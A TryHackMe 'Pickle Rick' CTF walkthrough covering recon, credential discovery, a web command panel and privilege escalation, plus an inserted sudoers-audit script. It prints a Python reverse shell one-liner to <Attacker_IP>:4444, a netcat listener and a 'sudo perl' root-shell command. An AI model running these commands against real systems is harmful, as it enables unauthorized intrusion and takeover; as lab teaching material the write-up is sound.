TryHackMe Walkthrough | Pickle Rick!

A Rick and Morty CTF. Help turn Rick back into a human!

Prerequisites

Before deploying the machine, make sure you have your VPN ready.

Deploy the machine once the VPN is connected.

Reconnaissance

An nmap scan shows two open ports (22 and 80), which means the target is also serving a web page.

nmap -sC -sV -p- --min-rate=10000 -oN nmap <Target_IP>

We have a webpage

Checking source code and robots.txt

We get the username in the source code of the page.

In robots.txt we find a string that might be the password.

Running gobuster, we find the login page.

gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm

We get a login page and we use the username and password we found earlier from the source code and the robots.txt

We get an option to input commands and execute them.

Running the ls command, we see all the files.

Instead of giving commands here, I chose to get a Python reverse shell.

Checking if python exists.

And yes it has python3

Now executing our payload.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Before executing, make sure your netcat listener is running on the mentioned port.

Got the Reverse Shell on port 4444

nc -nlvp 4444

Finding Flags

1st Flag

2nd Flag is inside the /rick directory

Escalating Privileges

Checking the permissions, we find that we can run any command on the system with sudo.

We can see that this user can run everything with sudo.

I used the sudo perl command to become root.

sudo perl -e 'exec "/bin/sh";'
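From the defender's side, the sudo rule described above is the root cause of this step. The following is an added example, not part of the original walkthrough, that audits sudoers text for unrestricted or interpreter-granting rules. The sample lines, account names and the NOPASSWD tag are constructed assumptions, and the parser handles only simple one-line user specs.

```python
import re

# Interpreters that yield a root shell when sudo allows them with free arguments.
# Illustrative subset chosen for this example; perl is the one used above.
SHELL_CAPABLE = {"sh", "bash", "perl", "python3", "ruby"}

# Simplified sudoers user spec: who host=(runas) [TAG:] cmd[, cmd...]
SPEC = re.compile(
    r"^(?P<who>[%\w.-]+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample; account names and rules are assumptions for illustration.
SAMPLE = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) NOPASSWD: /usr/bin/perl
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

def audit_sudoers(text):
    """Return [(line_no, principal, severity)] for risky user specs."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = SPEC.match(line)
        if not m:
            continue
        who, nopasswd = m["who"], "NOPASSWD:" in m["tags"]
        cmds = [c.strip() for c in m["cmds"].split(",")]
        # A bare interpreter path (no arguments listed) accepts any arguments.
        bare_interp = any(
            len(c.split()) == 1 and c.rsplit("/", 1)[-1] in SHELL_CAPABLE
            for c in cmds
        )
        if "ALL" in cmds and nopasswd:
            findings.append((no, who, "critical"))  # root, no password asked
        elif "ALL" in cmds and who != "root":
            findings.append((no, who, "review"))    # root after a password
        elif nopasswd and bare_interp:
            findings.append((no, who, "high"))      # interpreter gives a shell
    return findings

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE))
```

A service account such as the web server's should not appear in the output at all; the narrowly scoped `deploy` rule in the sample is the shape to aim for.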

3rd Flag.

In the root directory, we find the root flag as 3rd.txt

And we successfully finished the room and helped Rick turn back into his natural form.


B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

Aditya Kumar
